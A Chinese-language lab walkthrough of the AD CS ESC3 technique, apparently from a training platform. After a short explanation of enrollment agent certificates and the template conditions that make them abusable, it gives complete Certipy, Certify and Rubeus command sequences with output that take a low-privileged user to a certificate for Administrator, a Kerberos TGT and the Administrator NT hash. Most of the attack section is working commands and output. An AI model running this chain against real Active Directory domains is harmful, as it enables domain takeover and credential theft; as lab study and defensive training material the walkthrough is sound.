ESC3
1. 什么是ESC3
ESC3 漏洞利用了与证书请求代理(也称为注册代理)相关的弱点。
ESC3 是滥用 Misconfigured Enrollment Agent Templates ,它与 ESC1 和 ESC2 类似。但是,它涉及利用不同的 Extended Key Usage (EKU) ,并且需要额外的步骤才能实施滥用
如果攻击者获得了活动的注册代理证书,或者他们能利用配置错误的模板权限来注册一个新的注册代理证书,他们就可以滥用此权限来为其他用户获取证书,包括像域管理员(Domain Administrators)这样的高权限账户。
微软文档有时将术语
Extended Key Usage用作Enhanced Key Usage,但 RFC 5280 的 4.2.1.12 节将正确的名称定义为Extended Key Usage
1.1. 什么是注册代理
- 定义: 一种特殊的证书权限(EKU 为
Certificate Request Agent, 在 Microsoft 文档中通常称为注册代理OID 为1.3.6.1.4.1.311.20.2.1) - 官方用途: 允许管理员代人办事。例如,员工丢了智能卡,IT 管理员核实身份后,代表该员工向 CA 申请新证书。
1.2. 工作流程
- 拿“介绍信”: 代理人先申请到一个包含“注册代理”用途的证书。
- 替人签名: 代理人代表目标用户发起一个证书请求(CSR),并用自己的代理证书在上面加签。
- 上交申请: 代理人将这个共同签署的请求发给 CA。
- 下发证书: CA 验证代理证书有效后,颁发一张属于目标用户的证书。
2. 利用
2.1. 要求:
要利用ESC3,CA至少需要两个符合以下条件的模板
条件1: 一个允许低权限用户获取enrollment agent certificate 的模板,此模板的要求与ESC1基本一致
- CA向低权限用户授予注册权限
- 关闭管理员审批
- 无需授权签名
- 证书模板的SID过于宽松、允许低权限用户注册此证书模板
- 证书模板包含
Certificate Request Agent EKU,具体而言是证书请求代理 OID (1.3.6.1.4.1.311.20.2.1),允许代表其他主体请求其他证书模板
条件2: 此模板允许低权限用户使用注册代理证书代表其他用户请求证书,此外,此模板还定义了 Extended Key Usage ,允许进行域身份验证。具体条件如下:
- CA向低权限用户授予注册权限
- 关闭管理员审批
- 模板架构版本为 1,或者大于 2 且指定了“应用程序策略颁发要求”,该要求必须包含“证书请求代理(Certificate Request Agent)”扩展密钥用法(EKU)。
- 证书模板定义了能够启用域身份验证的 EKU(例如客户端认证)。
- 在 CA 级别未对注册代理(Enrollment Agents)实施任何限制。
2.2. On Linux
2.2.1. 枚举
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 41 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 29 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'lab-LAB-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'lab-LAB-DC-CA'
[*] Checking web enrollment for CA 'lab-LAB-DC-CA' @ 'LAB-DC.lab.local'
[!] Error checking web enrollment: [Errno 104] Connection reset by peer
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Template Name : ESC3
Display Name : ESC3
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectAltRequireEmail
SubjectRequireEmail
SubjectRequireDirectoryPath
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
AutoEnrollment
Private Key Flag : ExportableKey
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : FalseRequires Key Archival : False
Authorized Signatures Required : 0Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-05-01T17:47:22+00:00
Template Last Modified : 2023-07-05T11:47:23+00:00
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Property Enroll : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
[+] User Enrollable Principals : LAB.LOCAL\Domain Users
[!] Vulnerabilities
ESC3 : Template has Certificate Request Agent EKU set.2.2.2. 利用
攻击者(attacker@corp.local)会从一个配置错误的 EnrollAgent 模板(或者是一个具有 ESC2 "Any Purpose" 漏洞的模板)来申请证书。
获取注册代理证书
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -ca lab-LAB-DC-CA -target LAB-DC.lab.local -template ESC3
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 73
[*] Successfully requested certificate
[*] Got certificate with UPN 'blwasp@lab.local'
[*] Certificate object SID is 'S-1-5-21-2570265163-3918697770-3667495639-1103'
[*] Saving certificate and private key to 'blwasp.pfx'
[*] Wrote certificate and private key to 'blwasp.pfx'
使用注册代理证书代表目标用户请求证书
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -ca lab-LAB-DC-CA -target LAB-DC.lab.local -template User -pfx blwasp.pfx -on-behalf-of 'lab\Administrator'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 79
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@lab.local'
[*] Certificate object SID is 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.22.58
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@lab.local'
[*] Security Extension SID: 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Using principal: 'administrator@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
2.3. On Windows
2.3.1. 枚举
C:\Users\blwasp\Desktop>.\Certify.exe enum-templates --filter-enabled --filter-vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
Template Name : ESC3
Enabled : True
Publishing CAs : LAB-DC.lab.local\lab-LAB-DC-CA
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Certificate Name Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Manager Approval Required : False
Authorized Signatures Required : 0
Extended Key Usage : Certificate Request Agent
Certificate Application Policies : Certificate Request Agent
Vulnerabilities
ESC3 : The template has the 'Certificate Request Agent' EKU.Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Write Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Dacl : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Property : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
2.3.2. 利用
C:\Users\blwasp\Desktop>Certify.exe request --ca LAB-DC.lab.local\lab-LAB-DC-CA --template ESC3 --out-file esc3.pfx
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Request a certificate
[*] Current user context : LAB\blwasp
[*] No subject name specified, using current context as subject.
[*] Template : ESC3
[*] Subject : CN=Black Wasp, CN=Users, DC=lab, DC=local
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 80
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggCSABIID6DCCBYEwggV9B........
C:\Users\blwasp\Desktop>.\Certify.exe request-agent --ca LAB-DC.lab.local\lab-LAB-DC-CA --template User --target Administrator --agent-pass CertifyIt --agent-pfx MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggCSABIID6DCCBYEwggV9B........
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Request a certificate (on behalf of another user)
[*] Current user context : LAB\blwasp
[*] Template : User
[*] On Behalf Of : Administrator
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 84
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggC.....
Certify completed in 00:00:04.1585500
C:\Users\blwasp\Desktop>.\Rubeus.exe asktgt /user:administrator /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggC..... /getcredentials /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Got domain: lab.local
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=lab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lab.local\administrator'
[*] Using domain controller: fe80::9aa2:4d04:7c43:e9f6%18:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQjCCBj6gAwIBBaEDAgEWooIFWzCCBVdhggVTMI.........
ServiceName : krbtgt/lab.local
ServiceRealm : LAB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : LAB.LOCAL
StartTime : 4/20/2026 6:12:27 PM
EndTime : 4/21/2026 4:12:27 AM
RenewTill : 4/27/2026 6:12:27 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : ovIRH0ppPvAL4hObSE/PYA==
ASREP (key) : 41B0BABFF704DA5268EB1A94CB1EEBEF
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE